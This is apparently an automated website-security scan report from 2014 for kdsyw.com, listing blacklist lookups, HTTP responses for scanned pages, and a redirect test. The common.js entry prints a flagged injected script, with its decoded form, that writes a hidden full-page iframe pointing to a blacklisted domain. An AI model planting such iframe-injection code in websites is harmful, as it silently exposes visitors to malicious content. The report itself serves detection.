Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=kdsyw.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://kdsyw.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://kdsyw.com/ | HTTP/1.1 200 OK Date: Sun, 20 Jul 2014 00:47:07 GMT Accept-Ranges: bytes ETag: "8c5373d611a3cf1:301" Server: Microsoft-IIS/6.0 Content-Length: 12636 Content-Location: http://kdsyw.com/index.html Content-Type: text/html Last-Modified: Sat, 19 Jul 2014 05:25:22 GMT X-Powered-By: ASP.NET | clean |
http://kdsyw.com/index.html | 200 OK Content-Length: 12636 Content-Type: text/html | clean |
http://kdsyw.com/common.js | 200 OK Content-Length: 280 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: www.1581588.com var gotourl = "http://www.1581588.com/";
document.writeln("<div style=\"background-color:#FFF;\"><IFRAME border=0 name=I1 align=center marginWidth=0 src=\""+gotourl+"\" frameBorder=0 width=\"100%\" scrolling=no height=4000 target=\"_blank\" target=\"_blank\"><\/IFRAME><\/div>"); Decoded script: <div style="background-color:#FFF;"><IFRAME border=0 name=I1 align=center marginWidth=0 src="http://www.1581588.com/" frameBorder=0 width="100%" scrolling=no height=4000 target="_blank" target="_blank"></IFRAME></div> | ||
http://kdsyw.com/tj.js | 200 OK Content-Length: 120 Content-Type: application/x-javascript | clean |
http://kdsyw.com/sitemap.html | 200 OK Content-Length: 30444 Content-Type: text/html | clean |
http://kdsyw.com/curn0/ | HTTP/1.1 200 OK Date: Sun, 20 Jul 2014 00:47:11 GMT Accept-Ranges: bytes ETag: "86548d311a3cf1:301" Server: Microsoft-IIS/6.0 Content-Length: 13264 Content-Location: http://kdsyw.com/curn0/index.html Content-Type: text/html Last-Modified: Sat, 19 Jul 2014 05:25:16 GMT X-Powered-By: ASP.NET | clean |
http://kdsyw.com/curn0/index.html | 200 OK Content-Length: 13264 Content-Type: text/html | clean |
http://kdsyw.com/i4ke4/ | HTTP/1.1 200 OK Date: Sun, 20 Jul 2014 00:47:12 GMT Accept-Ranges: bytes ETag: "bcd9584ac3a0cf1:301" Server: Microsoft-IIS/6.0 Content-Length: 13371 Content-Location: http://kdsyw.com/i4ke4/index.html Content-Type: text/html Last-Modified: Wed, 16 Jul 2014 06:58:04 GMT X-Powered-By: ASP.NET | clean |
http://kdsyw.com/i4ke4/index.html | 200 OK Content-Length: 13371 Content-Type: text/html | clean |
http://kdsyw.com/tl150/ | HTTP/1.1 200 OK Date: Sun, 20 Jul 2014 00:47:14 GMT Accept-Ranges: bytes ETag: "687227f154a0cf1:301" Server: Microsoft-IIS/6.0 Content-Length: 13342 Content-Location: http://kdsyw.com/tl150/index.html Content-Type: text/html Last-Modified: Tue, 15 Jul 2014 17:48:10 GMT X-Powered-By: ASP.NET | clean |
http://kdsyw.com/tl150/index.html | 200 OK Content-Length: 13342 Content-Type: text/html | clean |
http://kdsyw.com/mk51d/ | HTTP/1.1 200 OK Date: Sun, 20 Jul 2014 00:47:15 GMT Accept-Ranges: bytes ETag: "e383bcaf9a2cf1:301" Server: Microsoft-IIS/6.0 Content-Length: 13383 Content-Location: http://kdsyw.com/mk51d/index.html Content-Type: text/html Last-Modified: Sat, 19 Jul 2014 02:33:14 GMT X-Powered-By: ASP.NET | clean |
http://kdsyw.com/mk51d/index.html | 200 OK Content-Length: 13383 Content-Type: text/html | clean |
http://kdsyw.com/mk51d/123.html | 200 OK Content-Length: 16658 Content-Type: text/html | clean |
http://kdsyw.com/curn0/122.html | 200 OK Content-Length: 16853 Content-Type: text/html | clean |
http://kdsyw.com/curn0/121.html | 200 OK Content-Length: 16704 Content-Type: text/html | clean |
http://kdsyw.com/mk51d/120.html | 200 OK Content-Length: 16957 Content-Type: text/html | clean |
http://kdsyw.com/curn0/119.html | 200 OK Content-Length: 16733 Content-Type: text/html | clean |
http://kdsyw.com/i4ke4/118.html | 200 OK Content-Length: 16896 Content-Type: text/html | clean |
http://kdsyw.com/mk51d/117.html | 200 OK Content-Length: 16847 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: kdsyw.com
Result:
HTTP/1.1 200 OK
Date: Sun, 20 Jul 2014 00:47:07 GMT
Accept-Ranges: bytes
ETag: "8c5373d611a3cf1:301"
Server: Microsoft-IIS/6.0
Content-Length: 12636
Content-Location: http://kdsyw.com/index.html
Content-Type: text/html
Last-Modified: Sat, 19 Jul 2014 05:25:22 GMT
X-Powered-By: ASP.NET
...12636 bytes of data.
GET / HTTP/1.1
Host: kdsyw.com
Result:
HTTP/1.1 200 OK
Date: Sun, 20 Jul 2014 00:47:07 GMT
Accept-Ranges: bytes
ETag: "8c5373d611a3cf1:301"
Server: Microsoft-IIS/6.0
Content-Length: 12636
Content-Location: http://kdsyw.com/index.html
Content-Type: text/html
Last-Modified: Sat, 19 Jul 2014 05:25:22 GMT
X-Powered-By: ASP.NET
...12636 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: kdsyw.com
Referer: http://www.google.com/search?q=kdsyw.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: kdsyw.com
Referer: http://www.google.com/search?q=kdsyw.com
Result:
The result is similar to the first query. There are no suspicious redirects found.